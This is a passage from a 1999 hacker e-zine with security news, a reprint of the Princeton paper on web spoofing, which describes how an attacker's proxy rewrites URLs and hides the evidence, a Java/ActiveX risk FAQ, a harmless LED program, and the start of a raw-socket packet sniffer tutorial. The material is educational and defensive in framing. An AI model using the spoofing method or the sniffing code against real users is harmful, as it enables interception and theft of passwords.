Nominations have opened for the 1999 Asia-Pacific IT&T Awards, which
recognise the innovative use of information technology and
telecommunications, as well as the outstanding achievements of
individuals, organisations and corporations. In Victoria, CD-ROM
creator Kylie Robertson and financial calculator maker Mainstream
Computing have announced their running.
http://newswire.com.au/9904/nom.htm
<a href="http://newswire.com.au/9904/nom.htm">Story link</a>
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yes we really do get a pile of mail in case you were wondering ;-0
heres a sampling of some of the mail we get here, the more interesting
ones are included and of course we had to get in the plugs for the
zine coz we love to receive those too *G* - Ed
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
*Well this is issue #13, included with the zip file version of this
*issue is an excellent reference on port numbers, it is included in
*a seperate file as that file alone is nearly 289k. anyway some
*interesting tidbits in this issue, enjoy ...
*
* - Ed
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Why Business Fears Distributed Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From buffer overflow (HNN) http://www.hackernews.com/orig/fear.html
By: B. Houston
For years, in the security industry, analysts have been spreading the anxiety of massive distributed attacks
against sites. They have described to clients the possiblity of a similtaneous, parallel system attack pulled
off with military like precision. To many, it looks like that day has actually arrived. During the recent attacks on the
Pentagon, many people in the media were eluding to everything from third-world military and terrorist
organizations to a single "script kiddie" playing with some new toys. The real truth, however, is that all these things
may be the case, or none of them. In the Pentagon incident we have press releases, media gossip and tons of
hype but the one thing we don't have is the truth. Out of the whole scenario, the only things we know for sure are
that there will be more fear and more attacks.
The problems demonstrated by the distributed attack scenario are many. First, you have the basic concept of a
large group of system crackers attacking one system with many resources, an immense amount of bandwidth and a
cooperative mind. System administrators, and their corporate bosses, already fear break-in's so a chance of a
massive scale penetration is a natural sleep thief for them. Secondly, many administrators feel that they may be able
to defend their systems against a lone attacker, but few believe that they could defeat an entire legion of system
attacks across a broad band of hosts. Many feel that their current firewalls, intrusion detection systems and logging
tools will be less effective against logically grouped attacks existing just under the delicate thereshold that
these systems monitor. In addition, you have the extended probability that a high visibility attack may
simply be the smokescreen or time-wasting bait used to cover a more dangerous and thorough attack elsewhere
on the network. Lastly, and certainly not least, security adminsitrators are alarmed at the growing availability and
granularity of the underground knowledgebase available on the Internet. New exploits are being discovered, coded,
quantified, explained and canonized on web sites around the world at an alarming pace.
System administrators have begun to report an increase in advanced probes, port scans and specific vulnerability
tests from the Internet. New tools available in the underground, and the increase of both raw computing
power and low level operating systems have made this situation even more apparent. More and more underground
users have made the switch to Linux and other free Unix based OS derivatives creating a more technical and
programming savvy band of hackers. Or at least that is what many security experts are claiming.
On the other hand these same new tools and bandwidth excesses make deception by the underground even easier
than a massive attack. Many of the new tools are capable of using address spoofing, parallel scanning and other
technologies that make even a simple port scan appear to be a "massive ditributed attack". Sites are being recorded
and published that offer access for attack pass-throughs and these are growing in number everyday as new users
expand home networks into Internet space via cable modems and ADSL. And yes, the membersof the
underground have taken notice.
The bottom line is that business and other organizations do indeed need to fear massive distributed penetration
attempts. These types of attacks are certainly become more possible and perhaps even probable, though a
paniced reaction certainly needs to be avoided at all costs. As always, things may not appear to be as they
are. The key here is to read, study and become familiar with the tools and protections available to you. And yes,
a few tests are probably in order...
@HWA
04.0 Hackers and Crackers
~~~~~~~~~~~~~~~~~~~~
From corporations to universities, computer hackers are still making trouble
- and making the law.
By Kim Komando
Article at http://popularmechanics.com/popmech/crnt/1HOMECRNT.html
(N.B: to be web posted 2nd week in April. If it appears in time for next issue it will appear here.)
@HWA
05.0 What IS frame spoofing etc anyways?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I've had several requests for info as to what exactly frame spoofing is so here' is what I learned
back from around 1997 when it first became common/mainstream knowledge, hopefully it will clear things
up a bit, - Ed
Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach
Technical Report 540-96
Department of Computer Science, Princeton University
Graphics by Markus H�bner (omitted, obviously)
Introduction
This paper describes an Internet security attack that could endanger the privacy of World Wide Web users and the integrity of their data. The attack can be carried
out on today's systems, endangering users of the most common Web browsers, including Netscape Navigator and Microsoft Internet Explorer.
Web spoofing allows an attacker to create a "shadow copy" of the entire World Wide Web. Accesses to the shadow Web are funneled through the attacker's
machine, allowing the attacker to monitor the all of the victim's activities including any passwords or account numbers the victim enters. The attacker can also cause
false or misleading data to be sent to Web servers in the victim's name, or to the victim in the name of any Web server. In short, the attacker observes and controls
everything the victim does on the Web.
We have implemented a demonstration version of this attack.
Spoofing Attacks
In a spoofing attack, the attacker creates misleading context in order to trick the victim into making an inappropriate security-relevant decision. A spoofing attack is
like a con game: the attacker sets up a false but convincing world around the victim. The victim does something that would be appropriate if the false world were
real. Unfortunately, activities that seem reasonable in the false world may have disastrous effects in the real world.
Spoofing attacks are possible in the physical world as well as the electronic one. For example, there have been several incidents in which criminals set up bogus
automated-teller machines, typically in the public areas of shopping malls [1]. The machines would accept ATM cards and ask the person to enter their PIN code.
Once the machine had the victim's PIN, it could either eat the card or "malfunction" and return the card. In either case, the criminals had enough information to copy
the victim's card and use the duplicate. In these attacks, people were fooled by the context they saw: the location of the machines, their size and weight, the way they
were decorated, and the appearance of their electronic displays.
People using computer systems often make security-relevant decisions based on contextual cues they see. For example, you might decide to type in your bank
account number because you believe you are visiting your bank's Web page. This belief might arise because the page has a familiar look, because the bank's URL
appears in the browser's location line, or for some other reason.
To appreciate the range and severity of possible spoofing attacks, we must look more deeply into two parts of the definition of spoofing: security-relevant decisions
and context.
Security-relevant Decisions
By "security-relevant decision," we mean any decision a person makes that might lead to undesirable results such as a breach of privacy or unauthorized tampering
with data. Deciding to divulge sensitive information, for example by typing in a password or account number, is one example of a security-relevant decision.
Choosing to accept a downloaded document is a security-relevant decision, since in many cases a downloaded document is capable of containing malicious elements
that harm the person receiving the document [2].
Even the decision to accept the accuracy of information displayed by your computer can be security-relevant. For example, if you decide to buy a stock based on
information you get from an online stock ticker, you are trusting that the information provided by the ticker is correct. If somebody could present you with incorrect
stock prices, they might cause you to engage in a transaction that you would not have otherwise made, and this could cost you money.
Context
A browser presents many types of context that users might rely on to make decisions. The text and pictures on a Web page might give some impression about where
the page came from; for example, the presence of a corporate logo implies that the page originated at a certain corporation.
The appearance of an object might convey a certain impression; for example, neon green text on a purple background probably came from Wired magazine. You
might think you're dealing with a popup window when what you are seeing is really just a rectangle with a border and a color different from the surrounding parts of
the screen. Particular graphical items like file-open dialog boxes are immediately recognized as having a certain purpose. Experienced Web users react to such cues
in the same way that experienced drivers react to stop signs without reading them.
The names of objects can convey context. People often deduce what is in a file by its name. Is manual.doc the text of a user manual? (It might be another kind of
document, or it might not be a document at all.) URLs are another example. Is MICR0S0FT.COM the address of a large software company? (For a while that address
pointed to someone else entirely. By the way, the round symbols in MICR0S0FT here are the number zero, not the letter O.) Was dole96.org Bob Dole's 1996
presidential campaign? (It was not; it pointed to a parody site.)
People often get context from the timing of events. If two things happen at the same time, you naturally think they are related. If you click over to your bank's page
and a username/password dialog box appears, you naturally assume that you should type the name and password that you use for the bank. If you click on a link
and a document immediately starts downloading, you assume that the document came from the site whose link you clicked on. Either assumption could be wrong.
If you only see one browser window when an event occurs, you might not realize that the event was caused by another window hiding behind the visible one.
Modern user-interface designers spend their time trying to devise contextual cues that will guide people to behave appropriately, even if they do not explicitly notice
the cues. While this is usually beneficial, it can become dangerous when people are accustomed to relying on context that is not always correct.
TCP and DNS Spoofing
Another class of spoofing attack, which we will not discuss here, tricks the user's software into an inappropriate action by presenting misleading information to that
software [3]. Examples of such attacks include TCP spoofing [4], in which Internet packets are sent with forged return addresses, and DNS spoofing [5], in which
the attacker forges information about which machine names correspond to which network addresses. These other spoofing attacks are well known, so we will not
discuss them further.
Web Spoofing
Web spoofing is a kind of electronic con game in which the attacker creates a convincing but false copy of the entire World Wide Web. The false Web looks just
like the real one: it has all the same pages and links. However, the attacker controls the false Web, so that all network traffic between the victim's browser and the
Web goes through the attacker.
Consequences
Since the attacker can observe or modify any data going from the victim to Web servers, as well as controlling all return traffic from Web servers to the victim, the
attacker has many possibilities. These include surveillance and tampering.
Surveillance The attacker can passively watch the traffic, recording which pages the victim visits and the contents of those pages. When the victim fills out a form,
the entered data is transmitted to a Web server, so the attacker can record that too, along with the response sent back by the server. Since most on-line commerce
is done via forms, this means the attacker can observe any account numbers or passwords the victim enters.
As we will see below, the attacker can carry out surveillance even if the victim has a "secure" connection (usually via Secure Sockets Layer) to the server, that is,
even if the victim's browser shows the secure-connection icon (usually an image of a lock or a key).
Tampering The attacker is also free to modify any of the data traveling in either direction between the victim and the Web. The attacker can modify form data
submitted by the victim. For example, if the victim is ordering a product on-line, the attacker can change the product number, the quantity, or the ship-to address.
The attacker can also modify the data returned by a Web server, for example by inserting misleading or offensive material in order to trick the victim or to cause
antagonism between the victim and the server.
Spoofing the Whole Web
You may think it is difficult for the attacker to spoof the entire World Wide Web, but it is not. The attacker need not store the entire contents of the Web. The whole
Web is available on-line; the attacker's server can just fetch a page from the real Web when it needs to provide a copy of the page on the false Web.
How the Attack Works
The key to this attack is for the attacker's Web server to sit between the victim and the rest of the Web. This kind of arrangement is called a "man in the middle
attack" in the security literature.
URL Rewriting
The attacker's first trick is to rewrite all of the URLs on some Web page so that they point to the attacker's server rather than to some real server. Assuming the
attacker's server is on the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org to the front of the URL. For example,
http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com. (The URL rewriting technique has been used for other
reasons by two other Web sites, the Anonymizer and the Zippy filter. See page 9 for details.)
Figure 1 shows what happens when the victim requests a page through one of the rewritten URLs. The victim's browser requests the page from
www.attacker.org, since the URL starts with http://www.attacker.org. The remainder of the URL tells the attacker's server where on the Web to go to get
the real document.
Figure 1: An example Web transaction during a Web spoofing attack. The victim requests a Web page. The following steps occur: (1) the victim's browser requests
the page from the attacker's server; (2) the attacker's server requests the page from the real server; (3) the real server provides the page to the attacker's server; (4)
the attacker's server rewrites the page; (5) the attacker's server provides the rewritten version to the victim.
Once the attacker's server has fetched the real document needed to satisfy the request, the attacker rewrites all of the URLs in the document into the same special
form by splicing http://www.attacker.org/ onto the front. Then the attacker's server provides the rewritten page to the victim's browser.
Since all of the URLs in the rewritten page now point to www.attacker.org, if the victim follows a link on the new page, the page will again be fetched through the
attacker's server. The victim remains trapped in the attacker's false Web, and can follow links forever without leaving it.
Forms
If the victim fills out a form on a page in a false Web, the result appears to be handled properly. Spoofing of forms works naturally because forms are integrated
closely into the basic Web protocols: form submissions are encoded in URLs and the replies are ordinary HTML Since any URL can be spoofed, forms can also be
spoofed.
When the victim submits a form, the submitted data goes to the attacker's server. The attacker's server can observe and even modify the submitted data, doing
whatever malicious editing desired, before passing it on to the real server. The attacker's server can also modify the data returned in response to the form submission.
"Secure" connections don't help
One distressing property of this attack is that it works even when the victim requests a page via a "secure" connection. If the victim does a "secure" Web access ( a
Web access using the Secure Sockets Layer) in a false Web, everything will appear normal: the page will be delivered, and the secure connection indicator (usually
an image of a lock or key) will be turned on.
The victim's browser says it has a secure connection because it does have one. Unfortunately the secure connection is to www.attacker.org and not to the place
the victim thinks it is. The victim's browser thinks everything is fine: it was told to access a URL at www.attacker.org so it made a secure connection to
www.attacker.org. The secure-connection indicator only gives the victim a false sense of security.
Starting the Attack
To start an attack, the attacker must somehow lure the victim into the attacker's false Web. There are several ways to do this. An attacker could put a link to a false
Web onto a popular Web page. If the victim is using Web-enabled email, the attacker could email the victim a pointer to a false Web, or even the contents of a page
in a false Web. Finally, the attacker could trick a Web search engine into indexing part of a false Web.
Completing the Illusion
The attack as described thus far is fairly effective, but it is not perfect. There is still some remaining context that can give the victim clues that the attack is going on.
However, it is possible for the attacker to eliminate virtually all of the remaining clues of the attack's existence.
Such evidence is not too hard to eliminate because browsers are very customizable. The ability of a Web page to control browser behavior is often desirable, but
when the page is hostile it can be dangerous.
The Status Line
The status line is a single line of text at the bottom of the browser window that displays various messages, typically about the status of pending Web transfers.
The attack as described so far leaves two kinds of evidence on the status line. First, when the mouse is held over a Web link, the status line displays the URL the link
points to. Thus, the victim might notice that a URL has been rewritten. Second, when a page is being fetched, the status line briefly displays the name of the server
being contacted. Thus, the victim might notice that www.attacker.org is displayed when some other name was expected.
The attacker can cover up both of these cues by adding a JavaScript program to every rewritten page. Since JavaScript programs can write to the status line, and
since it is possible to bind JavaScript actions to the relevant events, the attacker can arrange things so that the status line participates in the con game, always
showing the victim what would have been on the status line in the real Web. Thus the spoofed context becomes even more convincing.
The Location Line
The browser's location line displays the URL of the page currently being shown. The victim can also type a URL into the location line, sending the browser to that
URL. The attack as described so far causes a rewritten URL to appear in the location line, giving the victim a possible indication that an attack is in progress.
This clue can be hidden using JavaScript. A JavaScript program can hide the real location line and replace it by a fake location line which looks right and is in the
expected place. The fake location line can show the URL the victim expects to see. The fake location line can also accept keyboard input, allowing the victim to type
in URLs normally. Typed-in URLs can be rewritten by the JavaScript program before being accessed.
Viewing the Document Source
There is one clue that the attacker cannot eliminate, but it is very unlikely to be noticed.
By using the browser's "view source" feature, the victim can look at the HTML source for the currently displayed page. By looking for rewritten URLs in the HTML
source, the victim can spot the attack. Unfortunately, HTML source is hard for novice users to read, and very few Web surfers bother to look at the HTML source
for documents they are visiting, so this provides very little protection.
A related clue is available if the victim chooses the browser's "view document information" menu item. This will display information including the document's real
URL, possibly allowing the victim to notice the attack. As above, this option is almost never used so it is very unlikely that it will provide much protection.
Bookmarks
There are several ways the victim might accidentally leave the attacker's false Web during the attack. Accessing a bookmark or jumping to a URL by using the
browser's "Open location" menu item might lead the victim back into the real Web. The victim might then reenter the false Web by clicking the "Back" button. We
can imagine that the victim might wander in and out of one or more false Webs. Of course, bookmarks can also work against the victim, since it is possible to
bookmark a page in a false Web. Jumping to such a bookmark would lead the victim into a false Web again.
Tracing the Attacker
Some people have suggested that this attack can be deterred by finding and punishing the attacker. It is true that the attacker's server must reveal its location in order
to carry out the attack, and that evidence of that location will almost certainly be available after an attack is detected.
Unfortunately, this will not help much in practice because attackers will break into the machine of some innocent person and launch the attack there. Stolen machines
will be used in these attacks for the same reason most bank robbers make their getaways in stolen cars.
Remedies
Web spoofing is a dangerous and nearly undetectable security attack that can be carried out on today's Internet. Fortunately there are some protective measures you
can take.
Short-term Solution
In the short run, the best defense is to follow a three-part strategy:
1.disable JavaScript in your browser so the attacker will be unable to hide the evidence of the attack;
2.make sure your browser's location line is always visible;
3.pay attention to the URLs displayed on your browser's location line, making sure they always point to the server you think you're connected to.
This strategy will significantly lower the risk of attack, though you could still be victimized if you are not conscientious about watching the location line.
At present, JavaScript, ActiveX, and Java all tend to facilitate spoofing and other security attacks, so we recommend that you disable them. Doing so will cause you
to lose some useful functionality, but you can recoup much of this loss by selectively turning on these features when you visit a trusted site that requires them.
Long-term Solution
We do not know of a fully satisfactory long-term solution to this problem.
Changing browsers so they always display the location line would help, although users would still have to be vigilant and know how to recognize rewritten URLs.
For pages that are not fetched via a secure connection, there is not much more that can be done.
For pages fetched via a secure connection, an improved secure-connection indicator could help. Rather than simply indicating a secure connection, browsers should
clearly say who is at the other end of the connection. This information should be displayed in plain language, in a manner intelligible to novice users; it should say
something like "Microsoft Inc." rather than "www.microsoft.com."
Every approach to this problem seems to rely on the vigilance of Web users. Whether we can realistically expect everyone to be vigilant all of the time is debatable.
Related Work
We did not invent the URL rewriting technique. Previously, URL rewriting has been used as a technique for providing useful services to people who have asked for
them.
We know of two existing services that use URL rewriting. The Anonymizer, written by Justin Boyan at Carnegie Mellon University, is a service that allows users to
surf the Web without revealing their identities to the sites they visit. The Zippy filter, written by Henry Minsky, presents an amusing vision of the Web with
Zippy-the-Pinhead sayings inserted at random.
Though we did not invent URL rewriting, we believe we are the first to realize its full potential as one component of a security attack.
Acknowledgments
The URL-rewriting part of our demonstration program is based on Henry Minsky's code for the Zippy filter. We are grateful to David Hopwood for useful
discussions about spoofing attacks, and to Gary McGraw and Laura Felten for comments on drafts of this paper. The figure was designed by Gary McGraw.
For More Information
More information is available from our Web page at http://www.cs.princeton.edu/sip, or from Prof. Edward Felten at felten@cs.princeton.edu or (609) 258-5906.
References
[1] Peter G. Neumann. Computer-Related Risks. ACM Press, New York, 1995.
[2] Gary McGraw and Edward W. Felten. Java Security: Hostile Applets, Holes and Antidotes. John Wiley and Sons, New York, 1996.
[3] Robert T. Morris. A Weakness in the 4.2BSD UNIX TCP/IP Software. Computing Science Technical Report 117, AT&T Bell Laboratories, February 1985.
[4] Steven M. Bellovin. Security Problems in the TCP/IP Protocol Suite. Computer Communications Review 19(2):32-48, April 1989.
[5] Steven M. Bellovin. Using the Domain Name System for System Break-ins. Proceedings of Fifth Usenix UNIX Security Symposium, June 1995.
[6] Web site at http://www.anonymizer.com
[7] Web site at http://www.metahtml.com/apps/zippy/welcome.html
@HWA
06.0 What should I fear from Java and ActiveX?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security Tradeoffs: Java vs. ActiveX
An Unofficial View from the Princeton Secure Internet Programming Team
Last modified: Mon Apr 28 00:07:39 EDT 1997
+ What are Java and ActiveX?
Java and ActiveX are two systems that let people attach computer programs to Web pages. People like these systems because they allow Web
pages to be much more dynamic and interactive than they could be otherwise.
However, Java and ActiveX do introduce some security risk, because they can cause potentially hostile programs to be automatically
downloaded and run on your computer, just because you visited some Web page. The downloaded program could try to access or damage the
data on your machine, for example to insert a virus. Both Java and ActiveX take measures to protect your from this risk.
There has been a lot of public debate over which system offers better security. This page gives our opinion on this debate. Java and ActiveX
take fundamentally different approaches to security. We will concentrate on comparing the approaches, rather than critiquing the details of the
two systems. After all, details can be fixed.
+ Who are the players?
Java was developed by JavaSoft, a division of Sun Microsystems. Java is supported by both of the major browsers, Netscape Navigator and
Microsoft Internet Explorer.
ActiveX was developed by Microsoft. It is supported in Microsoft's Internet Explorer, and an ActiveX plug-in is available for Netscape Navigator.
The most intense public debate about security has been between JavaSoft and Microsoft. Each company has accused the other of being
careless about security, and some misleading charges have been made.
+ How does security work in ActiveX?
ActiveX security relies entirely on human judgement. ActiveX programs come with digital signatures from the author of the program and anybody
else who chooses to endorse the program.
Think of a digital signature as being like a person's signature on paper. Your browser can look at a digital signature and see whether it is
genuine, so you can know for sure who signed a program. (That's the theory, at least. Things don't always work out so neatly in practice.)
Once your browser has verified the signatures, it tells you who signed the program and asks you whether or not to run it. You have two choices:
either accept the program and let it do whatever it wants on your machine, or reject it completely.
ActiveX security relies on you to make correct decisions about which programs to accept. If you accept a malicious program, you are in big
trouble.
+ How does security work in Java?
Java security relies entirely on software technology. Java accepts all downloaded programs and runs them within a security "sandbox". Think of
the sandbox as a security fence that surrounds the program and keeps it away from your private data. As long as there are no holes in the fence,
you are safe.
Java security relies on the software implementing the sandbox to work correctly.
+ How can ActiveX security break down?
The main danger in ActiveX is that you will make the wrong decision about whether to accept a program. One way this can happen is that some
person you trust turns out not to deserve that trust.
The most dangerous situation, though, is when the program is signed by someone you don't know anything about. You'd really like to see what
this program does, but if you reject it you won't be able to see anything. So you rationalize: the odds that this particular program is hostile are
very small, so why not go ahead and accept it? After all, you accepted three programs yesterday and nothing went wrong. It's just human nature
to accept the program.
Even if the risk of accepting one program is low, the risk adds up when you repeatedly accept programs. And when you do get the one bad
program, there is no limit on how much damage it can do.
The only way to avoid this scenario is to refuse all programs, no matter how fun or interesting they sound, except programs that come from a few
people you know well. Who has the self-discipline to do that?
+ How can Java security break down?
The main danger in Java comes from the complexity of the software that implements the sandbox. Common sense says that complicated
technology is more likely to break down than simple technology. Java is pretty complicated, and several breakdowns have happened in the past.
If you're the average person, you don't have the time or the desire to examine Java and look for implementation errors. So you have to hope the
implementers did everything right. They're smart and experienced and motivated, but that doesn't make them infallible.
When Java security does break down, the potential consequences are just as bad as those of an ActiveX problem: a hostile program can come
to your machine and access your data at will.
+ What about "signed applets" in Java?
One problem with the original version of Java is that the "sandbox" can be too restrictive. For example, Java programs are not allowed to
access files, so there's no way to write a text editor. (What good is editing if you can't save your work?)
Java-enabled products are now starting to use digital signatures to work around this problem. The idea is like ActiveX: programs are digitally
signed and you can decide, based on the signature, to give a program more power than it would otherwise have. This lets you run a text editor
program if you decide that you trust its author.
The downside of this scheme is that it introduces some of the ActiveX problems. If you make the wrong decision about who to trust, you could be
very sorry. There's no known way to get around this dilemma. Some kinds of programs must be given power in order to be useful, and there's no
ironclad guarantee that those programs will be well-behaved.
Still, Java with signed applets does offer some advantages over ActiveX. You can put only partial trust in a program, while ActiveX requires
either full trust or no trust at all. And a Java-enabled browser could keep a record of which dangerous operations are carried out by each trusted
program, so it would be easier to reconstruct what happened if anything went wrong. (Current browsers don't do this record-keeping, but we
wish they would.) Finally, Java offers better protection against accidental damage caused by buggy programs.
+ What about plug-ins?
Plug-ins are a method for adding code to your browser. Plug-ins have the same security model as ActiveX: when you download a plug-in, you
are trusting it to be harmless. All of the warnings about ActiveX programs apply to plug-ins too.
+ Can I be hurt by a "good" plug-in or ActiveX program?
Unfortunately, yes. This depends entirely on what the plug-in or program does. Many plug-ins such as Macromedia's Shockwave or Sun's
Safe-Tcl are actually completely general programming systems, just like Java. By accepting a plug-in like this, you're trusting that the plug-in
program has no security-relevant bugs. As we have seen with Java, systems that are meant to be secure often have bugs that lead to security
problems.
With ActiveX, this problem is made worse if you click the box which accepts all programs signed by the same person (for example, if you accept
anything signed by Microsoft). While one Microsoft program may be secure, another one may have a security-relevant bug.
This problem even applies to code written by your own company for internal use. Once the plug-in or program is installed in your browser, an
external attacker (who knew about the program) could write a Web page which used your internal program bug passed it funny data which
corrupted the program and took over your machine.
If you're feeling paranoid, the only plug-ins you should allow are those with less than general purpose functionality. A plug-in which handles a new
image, video, or audio format is less likely to be exploitable than a plug-in for a completely general animation system.
+ This sounds pretty scary. How worried should I be?
The good news is that there have been few incidents of people being damaged by hostile Java or ActiveX programs. The reason is simply that
the people with the skills to create malicious programs have chosen not to do so.
For most people, continuing to use Java and ActiveX is the right choice. If you are informed about the risks, you can make a rational decision to
accept some danger in exchange for the benefits of using Java and ActiveX.
+ How can I lower my risk?
There are several things you can do.
+ Think very carefully before accepting a digitally signed program. How competent and trustworthy is the signer?
Use up-to-date browser versions, and install the security patches offered by your browser vendor.
Never surf the Web on a computer that contains highly sensitive information like medical records.
DISCLAIMER: This information is our opinion only. It is not the opinion of Princeton University or of our research sponsors. We do not and
cannot guarantee that you will be safe if you follow our advice.
Copyright � 1997 by Edward W. Felten
Princeton University
Department of Computer Science
Contact: sip@cs.princeton.edu
@HWA
07.0 Some cool geek code (leetbuzz.c) to roll your led's from a suid root acct...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* leetbuzz.c - buzzes your scr/lck led in a leet fashion
* derived from heartbeat.c by alessandro rubini (your book's just best :)
*
* this little program will attract some geek eyes at the next hack event
* for sure ;-)
*
* by scut <scut@nb.in-berlin.de>
*
* must be executed as suid root, fortunatly
*
* compile with: gcc -o leetbuzz leetbuzz.c -lm
*
* tested with 2.[02].x on alpha, sparc and x86
*/
#define LB_SHUTTER 32
// #define LB_MODE_ALT
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/kd.h>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
int consolefd;
char flasher[LB_SHUTTER];
void led_runthru(char *, int, unsigned long);
void led_doshutter(char *, int);
int led_sinewave(int);
int led_init(void);
void led_uninit(void);
void led_set(void);
void led_unset(void);
int led_change(void);
int
main(int argc, char **argv)
{
if (led_init() == 0) {
fprintf(stderr, "cannot open tty, lammah\n");
exit(1);
}
for (;;) {
led_sinewave(5);
led_runthru(flasher, LB_SHUTTER, 5000);
}
exit(0); /* never happen */
}
/* runs through our neat array
*/
void
led_runthru(char *p_array, int max, unsigned long waitdigit)
{
struct timeval st;
struct timeval ct;
int n;
for (n = 0; n < max; n++) {
if (gettimeofday(&st, NULL) == -1) return;
if (p_array[n] == '\x00') {
led_unset();
} else if (p_array[n] == '\x01') {
led_set();
}
if (gettimeofday(&ct, NULL) == -1) return;
while ((((ct.tv_sec * 1000000) + ct.tv_usec) -
((st.tv_sec * 1000000) + st.tv_usec)) < waitdigit)
gettimeofday(&ct, NULL);
}
return;
}
/* little bresenham hack to stretch our intensity
*/
void
led_doshutter(char *p_array, int intensity)
{
int n = 0;
float e;
int x, y;
if (intensity > LB_SHUTTER)
return;
for (y = x = 0; x < LB_SHUTTER; x++) {
e = y - ((x * intensity) / LB_SHUTTER);
if (e < 0) {
e *= -1;
}
if (e <= 0.5) {
p_array[x] = '\x00';
} else {
p_array[x] = '\x01';
y++;
}
}
#ifdef DEBUG
for (x = 0; x < LB_SHUTTER; x++)
printf("%c", (p_array[x]) ? 'X' : ' ');
printf("\n");
#endif
return;
}
/* tells wether the led should be active (1) or not (0) for sinewave
* with period (in seconds)
* first call -> init
* period = 0 -> init
*/
int
led_sinewave(int period)
{
static struct timeval *st = NULL;
static struct timeval *ct = NULL;
double t_f;
unsigned long long st_usec;
unsigned long long ct_usec;
unsigned long long td;
/* new init ? */
if (period == 0) {
free(st);
st = NULL;
}
if (st == NULL) {
st = calloc(1, sizeof(struct timeval));
if (gettimeofday(st, NULL) == -1) {
fprintf(stderr, "cannot get time of day for st :)\n");
exit(1);
}
}
if (period == 0)
return (0);
if (ct == NULL) {
ct = calloc(1, sizeof(struct timeval));
}
/* get current time and then compare */
if (gettimeofday(ct, NULL) == -1) {
fprintf(stderr, "cannot get time of day for ct :)\n");
exit(1);
}
st_usec = (st->tv_sec * 1000000) + st->tv_usec;
ct_usec = (ct->tv_sec * 1000000) + ct->tv_usec;
td = ct_usec - st_usec; /* difference */
/* compute relative period, then compute sine value */
td = (td % (period * 1000000));
t_f = (double)(td / (double)(period * 1000000));
t_f *= 2 * M_PI; /* yeah, i like math.h */
#ifdef LB_MODE_ALT
t_f = ((sin(t_f) + 1) / 3) + 0.3;
#else
t_f = (sin(t_f) + 1) / 2; /* we don't need negative LEDs */
#endif
#ifdef DEBUG
printf("%3.5f : ", t_f);
#endif
led_doshutter(flasher, (int)(t_f * LB_SHUTTER));
return(1);
}
int
led_init(void)
{
consolefd = open("/dev/tty0", O_RDONLY);
if (consolefd == -1)
return(0);
return(1);
}
void
led_uninit(void)
{
close(consolefd);
return;
}
void
led_set(void)
{
char led;
ioctl(consolefd, KDSETLED, 1);
return;
}
void
led_unset(void)
{
char led;
ioctl(consolefd, KDSETLED, 0);
return;
}
int
led_change(void)
{
char led;
if (ioctl(consolefd, KDGETLED, &led) != -1) {
ioctl(consolefd, KDSETLED, (led == 1) ? 0 : 1);
}
return(led);
}
@HWA
08.0 Building a packet sniffer from the ground up Part I
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Basic Packet-Sniffer Construction
from the Ground Up
Part 1
by
Chad Renfro
raw_sock@hotmail.com
Packet sniffers are applications used by network administrators to monitor and
validate network traffic. Sniffers are programs used to read packets that travel across
the network at various levels of the OSI layer. And like most security tools sniffers too
can be used for both good and destructive purposes. On the light-side of network
administration sniffers help quickly track down problems such as bottlenecks and
misplaced filters. However on the dark-side sniffers can be used to reap tremendous
amounts of havoc by gathering legitimate user names and passwords so that other
machines can be quickly compromised. Hopefully this paper will be used to help
administrators gain control of their networks by being able to analyze network traffic
not only by using preconstructed sniffers but by being able to create their own. This
paper will look at the packet sniffer from the bottem up, looking in depth at the sniffer
core and then gradualy adding functionality to the application. The example included
here will help illustrate some rather cumbersome issues when dealing with network
programing. In no way will this single paper teach a person to write a complete sniffing
application like tcpdump or sniffit. It will however teach some very fundamental issues
that are inherent to all packet sniffers. Like how the packets are accessed on the network
and how to work with the packets at different layers.
The most basic sniffer...
Sniffer #1.
This sniffer will illustrate the use of the SOCK_RAW device and show how to gather
packets from the network and print out some simple header information to std_out.
Although the basic premise is that packet sniffers operate in a promiscuous mode which
listens to all packets weather or not the packet is destined for the machines mac address,
this example will collect packets in a non-promiscuous mode . This will let usconcentrate
on the SOCK_RAW device for the first example. To operate this same code in a
promiscous mode the network card may be put in a promiscous mode manually. To do
this type this in after the log in :
> su -
Password : ********
# ifconfig eth0 promisc
This will now set the network interface eth0 in promiscous mode.
/************************simple_Tcp_sniff.c********************/
1. #include <stdio.h>
2. #include <sys/socket.h>
3. #include <netinet/in.h>
4. #include <arpa/inet.h>
5. #include "headers.h"
6. int main()
7. {
8. int sock, bytes_recieved, fromlen;
9. char buffer[65535];
10. struct sockaddr_in from;
11. struct ip *ip;
12. struct tcp *tcp;
13.
14. sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
15. while(1)
16. {
17. fromlen = sizeof from;
18. bytes_recieved = recvfrom(sock, buffer, sizeof buffer, 0,
(struct sockaddr *)&from, &fromlen);
19. printf("\nBytes received ::: %5d\n",bytes_recieved);
20. printf("Source address ::: %s\n",inet_ntoa(from.sin_addr));
21. ip = (struct ip *)buffer;
